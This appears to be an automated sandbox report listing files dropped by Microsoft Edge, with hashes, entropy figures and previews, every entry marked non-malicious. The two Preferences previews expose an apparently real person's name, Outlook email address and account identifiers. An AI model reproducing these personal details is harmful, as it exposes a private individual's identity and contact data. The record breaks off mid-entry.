Preview:	............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...\|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+..............................0...;...J...S.h.].X.e.../..0.................!.........2...<...G...P.i.g.Y.m.......1..2..0...0.......+......*...1...8...C...M.~.^.m.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.258287466341134
Encrypted:	false
SSDEEP:	6:H+pLSr+q2PCN23oH+Tcwtn1QzDdIFUt8Y+pLSbZmw+Y+pLS8FNVkwOCN23oH+Tc5:EOSv1YebnuKFUt8zOb/+zOw5eYebnkJ
MD5:	16B2386692A0028DF1B95CB75F4B5D94
SHA1:	1491609DAC1EB65AC4E895D1D016E5FD63D59A4F
SHA-256:	28862690F377CE1339F0EFBF8511404304D530313CAC46C6EF6505710A5EE613
SHA-512:	3E172815C41D1E79D421E1C67FEA149F69183C2643536C21215FBEE3F233693474C7BC629A1C7AF64D4F3EED056321949E5BDE7BB7558E13B1DF38FB1AAFDE1B
Malicious:	false
Preview:	2024/11/01-15:58:16.333 388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/MANIFEST-000001.2024/11/01-15:58:16.333 388 Recovering log #3.2024/11/01-15:58:16.334 388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.258287466341134
Encrypted:	false
SSDEEP:	6:H+pLSr+q2PCN23oH+Tcwtn1QzDdIFUt8Y+pLSbZmw+Y+pLS8FNVkwOCN23oH+Tc5:EOSv1YebnuKFUt8zOb/+zOw5eYebnkJ
MD5:	16B2386692A0028DF1B95CB75F4B5D94
SHA1:	1491609DAC1EB65AC4E895D1D016E5FD63D59A4F
SHA-256:	28862690F377CE1339F0EFBF8511404304D530313CAC46C6EF6505710A5EE613
SHA-512:	3E172815C41D1E79D421E1C67FEA149F69183C2643536C21215FBEE3F233693474C7BC629A1C7AF64D4F3EED056321949E5BDE7BB7558E13B1DF38FB1AAFDE1B
Malicious:	false
Preview:	2024/11/01-15:58:16.333 388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/MANIFEST-000001.2024/11/01-15:58:16.333 388 Recovering log #3.2024/11/01-15:58:16.334 388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	627
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:	9D7435EA49A80FDD66E4915F513017F9
SHA1:	469F6C6E4B19B85CC1BE497812B2F20864F4FF2C
SHA-256:	409D4C47E940688527D730B996E8991E010988C7671565467ED69D640D0947F3
SHA-512:	0561CD632D4219AEF4686DE40EC092921384CA89755D354801E0EAEC8645A8630A180807AF518AC8FCF01F71EB3D10FAA9CE1E62C7A7226A274975BDCB7EEB4C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.159553450897794
Encrypted:	false
SSDEEP:	6:H+pLMzM9+q2PCN23oH+Tcwt8NIFUt8Y+pLMzMJZmw+Y+pLMzM9VkwOCN23oH+TcN:Eqa+v1YebpFUt8zqe/+zqaV5eYebqJ
MD5:	1F2AD41499FF505317BB2339A99C68A6
SHA1:	30DAB704B541AFA140333E210492C488E0F4F454
SHA-256:	675D77728C29EC482CC5748951FFFCE44A14D7503EC9C377346A9DB55C49BCFD
SHA-512:	90351DFCFE4A7D44C759D1BDBAC1D37668DBF6608A83B65EE5E19E5951E2AB7FA2196A79301B3F7BF0EB143E5DE791C36A9AB38FAE3CB30F2A5CD5444A247E7A
Malicious:	false
Preview:	2024/11/01-15:58:14.024 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/01-15:58:14.024 1ebc Recovering log #3.2024/11/01-15:58:14.024 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.159553450897794
Encrypted:	false
SSDEEP:	6:H+pLMzM9+q2PCN23oH+Tcwt8NIFUt8Y+pLMzMJZmw+Y+pLMzM9VkwOCN23oH+TcN:Eqa+v1YebpFUt8zqe/+zqaV5eYebqJ
MD5:	1F2AD41499FF505317BB2339A99C68A6
SHA1:	30DAB704B541AFA140333E210492C488E0F4F454
SHA-256:	675D77728C29EC482CC5748951FFFCE44A14D7503EC9C377346A9DB55C49BCFD
SHA-512:	90351DFCFE4A7D44C759D1BDBAC1D37668DBF6608A83B65EE5E19E5951E2AB7FA2196A79301B3F7BF0EB143E5DE791C36A9AB38FAE3CB30F2A5CD5444A247E7A
Malicious:	false
Preview:	2024/11/01-15:58:14.024 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/01-15:58:14.024 1ebc Recovering log #3.2024/11/01-15:58:14.024 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	14904
Entropy (8bit):	1.2167336319443693
Encrypted:	false
SSDEEP:	48:9SFSB2Xtb78rnjOiWDMv9IgXFZJ+rFt+z:924OiZ9T1ZkBoz
MD5:	C56212E61741679EF5F6578EDEA00756
SHA1:	5AF1E35C14BA84CF98D065754E770CCE6DE8B0F1
SHA-256:	0490DBA939E2FCE1AC5FF4F28EC74514E3638758795C982489361698383A6EC7
SHA-512:	8930FE83EE8CEEBFA31B7998761B7CFE8ECE0B198F77739D926BDD66B57050F261B9643DCE3327B903941446AA5BC1B4265047D987ED08669F5BB9B3F4235908
Malicious:	false
Preview:	............` .;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	367
Entropy (8bit):	5.2461217755747445
Encrypted:	false
SSDEEP:	6:H+pLi/9s1CN23oH+Tcwt8age8Y55HEZzXELIx2KLlV+pLM+I9+q2PCN23oH+Tcwo:E2VsYeb8rcHEZrEkVL8p2+v1Yeb8rcH0
MD5:	7BB4644817D40B0B6A1EA1442AE40D5D
SHA1:	24EC2CE8797A210285A1E40200023910E558B6F0
SHA-256:	3F2F3FC1C77829925111288E644757E8D8904892909C59865AFED5873DAE4E63
SHA-512:	47CFC6517D5EEDC44A378353698AF494F59FF53C7EA355F0BA17F1320F16AB8E0B670C1ADE0AE1FDA48A2B5FCBFABDB87CD22EE1032B967682BD38079E210CF8
Malicious:	false
Preview:	2024/11/01-15:58:13.984 1ebc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2024/11/01-15:58:14.016 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.191564001746288
Encrypted:	false
SSDEEP:	6:H+pLdFMM+q2PCN23oH+Tcwt8a2jMGIFUt8Y+pLZqZmw+Y+pLzEMMVkwOCN23oH+k:EJFMM+v1Yeb8EFUt8zM/+zUMMV5eYebw
MD5:	BFCE04601847B44017123ADBF7E5FF5B
SHA1:	D1C26EB98303CB977C25EAD310A5F06F6BF9B729
SHA-256:	6EEAC60A1C49006D6C6E792CC72573589CFB9C28D0119C4F3FCBDD4C76FD668F
SHA-512:	C82D384C189F33AD6A3DE1CAB262A473D80C831D84B4B15D4F1E6B7BBC9DBC61CB621EEFAA0281B52891B5E07DE4142A6AB1D275A20E7A9AA3346D9A5BAEA0F0
Malicious:	false
Preview:	2024/11/01-15:58:13.239 1dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/01-15:58:13.250 1dfc Recovering log #3.2024/11/01-15:58:13.269 1dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.191564001746288
Encrypted:	false
SSDEEP:	6:H+pLdFMM+q2PCN23oH+Tcwt8a2jMGIFUt8Y+pLZqZmw+Y+pLzEMMVkwOCN23oH+k:EJFMM+v1Yeb8EFUt8zM/+zUMMV5eYebw
MD5:	BFCE04601847B44017123ADBF7E5FF5B
SHA1:	D1C26EB98303CB977C25EAD310A5F06F6BF9B729
SHA-256:	6EEAC60A1C49006D6C6E792CC72573589CFB9C28D0119C4F3FCBDD4C76FD668F
SHA-512:	C82D384C189F33AD6A3DE1CAB262A473D80C831D84B4B15D4F1E6B7BBC9DBC61CB621EEFAA0281B52891B5E07DE4142A6AB1D275A20E7A9AA3346D9A5BAEA0F0
Malicious:	false
Preview:	2024/11/01-15:58:13.239 1dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/01-15:58:13.250 1dfc Recovering log #3.2024/11/01-15:58:13.269 1dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 3, database pages 9, cookie 0x5, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.4137784766694259
Encrypted:	false
SSDEEP:	24:TL1PD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFS:T1/qALihje9kqL42WOT/9F
MD5:	5AA0D6A2ECCE658F08BF5E58B9B36AD2
SHA1:	F1C9C69A80D845597628FFDC3618ED62593CE473
SHA-256:	9D16F84C9DA5A8CB2E660AE2E225B723EE6137DF147A56791375FC5B22CBABCA
SHA-512:	B8D37839DB68392E92EA024FA8C54FF3B04D9E7E6DBF28B2AC34420E49614493FE387B0B35F5D3FB65F9D111DF68CCB70C9FC34943D0D07A93F3A70CF1F12C21
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9000
Entropy (8bit):	4.994257462742733
Encrypted:	false
SSDEEP:	192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:	3CB1586353968B52F028A678ED76E36E
SHA1:	CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:	14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:	DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF1072d79.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9000
Entropy (8bit):	4.994257462742733
Encrypted:	false
SSDEEP:	192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:	3CB1586353968B52F028A678ED76E36E
SHA1:	CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:	14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:	DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.39928147729940616
Encrypted:	false
SSDEEP:	24:TLil7jyFdpjKrFKtDjK8FKlQjALF+77D30YFHNWsJWur6Uwcc45f5:TojYdpjKBKBjKOK+jAh+vt4scumU1c0
MD5:	A064A6CDCC2C3E56A6559FA968BCD0F5
SHA1:	27D786C40D7773809C12AA9998B5CFC77D17A2E4
SHA-256:	86D3A36C7215E5D7FE13921DA138335FE0C3E096DA3EC683540D385D9EAAAF99
SHA-512:	730A2A76A211CBCC885B187F01770A920FB28EC4C5EA394F1E52E201B79D672A7ACAB1AAE10D4A8E66C628B09C72F320B4EF399716722665CCBF860C102119C3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.........g.......@...Z..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	21032
Entropy (8bit):	0.027392369213629218
Encrypted:	false
SSDEEP:	3:ZWfllGFll5n/fll5sNll5DFll5X/fllL:ZWW3Bs/rX/b
MD5:	010B04D29A7CB33A2E3BEDF8A8F38E4A
SHA1:	C086697B2EC2866BF7790BD04EC793947FE00727
SHA-256:	8F21F47866C02F16EDEC7C6EE3BDA313F3386FBFE914835D174B48F2CC982450
SHA-512:	53EA7DEF71E83B30E61373089E2E9650B973716F949ABB3F6CD36CD8E9BED8967DDDA3BD4C775BBB8BC0E156281080E853428BAA3FA5E0C7F4843CB760FFB57E
Malicious:	false
Preview:	...............'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.5640592688453514
Encrypted:	false
SSDEEP:	96:DIEumQv8m1ccnvS6hN4sUI93sz3xVsF5jsR+s7fQsJ:DIEumQv8m1ccnvS6EIq450v
MD5:	4B67FACF2CED70007929061F17DD2EB6
SHA1:	02F7CF0C223B7D400B2E31B31B9087804DDE39EA
SHA-256:	C16C239CF7824373C42AB0FB1CA7A0509E7C67DBE8EF1C0A1FB90E3F3940C9D9
SHA-512:	90C4ABA7E66EEDB1980FF3C824056A017D75260A90933520854907B7504AD8C5E16CB971F37063788791279BACA47BAF93510A00493A2AC91499CBB2906227F9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2491
Entropy (8bit):	5.025691982161567
Encrypted:	false
SSDEEP:	48:YPj114Vr8KVNkGkXX6VVks0LtpsA1Cx9crbJ/anUJaYPI7xaMGH1oB+CmCO:KDoGX6VVOZpsAAOrMn3YPo0MG6+Zh
MD5:	70FFCABAC8DE01F9F7C0BCCAF64C1619
SHA1:	D01EE1E0289EB0FBD2CF1EFF6703A86AABFD6438
SHA-256:	6FB61A4E8427C7FEF6986879C5A789CEBC9E57B2A7E20D62F5F3F2AB08C07F99
SHA-512:	EB6080E6F884507C15D3D1B109E33201838147282018C31FEFDD32133A4F13D3907EA9A9949C04ED0D1FBCBE1CBA002B9D1727F56BB51EBB0DFED54B11C88B98
Malicious:	false
Preview:	{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13374964693055383"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF1072d98.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2491
Entropy (8bit):	5.025691982161567
Encrypted:	false
SSDEEP:	48:YPj114Vr8KVNkGkXX6VVks0LtpsA1Cx9crbJ/anUJaYPI7xaMGH1oB+CmCO:KDoGX6VVOZpsAAOrMn3YPo0MG6+Zh
MD5:	70FFCABAC8DE01F9F7C0BCCAF64C1619
SHA1:	D01EE1E0289EB0FBD2CF1EFF6703A86AABFD6438
SHA-256:	6FB61A4E8427C7FEF6986879C5A789CEBC9E57B2A7E20D62F5F3F2AB08C07F99
SHA-512:	EB6080E6F884507C15D3D1B109E33201838147282018C31FEFDD32133A4F13D3907EA9A9949C04ED0D1FBCBE1CBA002B9D1727F56BB51EBB0DFED54B11C88B98
Malicious:	false
Preview:	{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13374964693055383"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.323098996850684
Encrypted:	false
SSDEEP:	3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
MD5:	8DA62954B0B14642CF287A260418E39B
SHA1:	E82BF98669AE1D73BBD9294D9F454044D5C2622E
SHA-256:	B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
SHA-512:	E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.153228511455068
Encrypted:	false
SSDEEP:	6:H+pLAs/4M1CN23oH+TcwtE/a252KLlV+pLAEgMq2PCN23oH+TcwtE/a2ZIFUv:Ep4MYeb8xL8oMv1Yeb8J2FUv
MD5:	B761668797E2438037D588392C162C22
